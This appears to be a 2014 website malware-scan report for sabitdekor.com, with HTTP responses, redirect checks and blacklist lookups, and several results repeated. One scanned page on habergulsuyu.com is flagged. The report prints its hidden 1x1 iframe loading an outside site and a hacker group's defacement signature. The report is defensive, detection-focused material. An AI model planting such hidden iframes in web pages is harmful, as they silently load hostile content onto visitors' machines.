Scanned pages/files
Request | Server response | Status |
http://sabitdekor.com/ | HTTP/1.1 200 OK Connection: close Date: Thu, 21 Aug 2014 05:50:24 GMT Server: LiteSpeed Content-Length: 7951 Content-Type: text/html X-Powered-By: PHP/5.3.27 | clean |
http://habergulsuyu.com/kabala/kurdish/index.html | 200 OK Content-Length: 8410 Content-Type: text/html | suspicious |
Hidden iFrame found. The same iFrame was found in 48 websites. size: 1x1 src: http://www.trenz.pl/rc/ <iframe src="http://www.trenz.pl/rc/" width=1 height=1 frameborder=0> Deface/Content modification. The following signature was found: | Hacked By KaBaLa | Kurdish Hacker Team | ...[493 bytes skipped]... ><link rel=File-List href="Sifresiz_dosyalar/filelist.xml"> <link rel=Edit-Time-Data href="Sifresiz_dosyalar/editdata.mso"> <!--[if !mso]> <style> v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} </style> <![endif]--> <title> | Hacked By KaBaLa | Kurdish Hacker Team |</title> <!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>avsin</o:Author> <o:Template>Normal</o:Template> <o:LastAuthor>avsin</o:LastAuthor> <o:Revision>9</o:Revision> <o:TotalTime>1</o:TotalTime> <o:Created>2012-11-20T05:25:00Z</o:Created> <o:LastSaved>2012-11-20T05:30:00Z</o:LastSaved&g ...[9477 bytes skipped]... | ||
http://habergulsuyu.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sabitdekor.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Aug 2014 05:50:24 GMT
Server: LiteSpeed
Content-Length: 7951
Content-Type: text/html
X-Powered-By: PHP/5.3.27
...7951 bytes of data.
GET / HTTP/1.1
Host: sabitdekor.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Aug 2014 05:50:24 GMT
Server: LiteSpeed
Content-Length: 7951
Content-Type: text/html
X-Powered-By: PHP/5.3.27
...7951 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sabitdekor.com
Referer: http://www.google.com/search?q=sabitdekor.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sabitdekor.com
Referer: http://www.google.com/search?q=sabitdekor.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sabitdekor.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sabitdekor.com/
Result: sabitdekor.com is not infected or malware details are not published yet.
Result: sabitdekor.com is not infected or malware details are not published yet.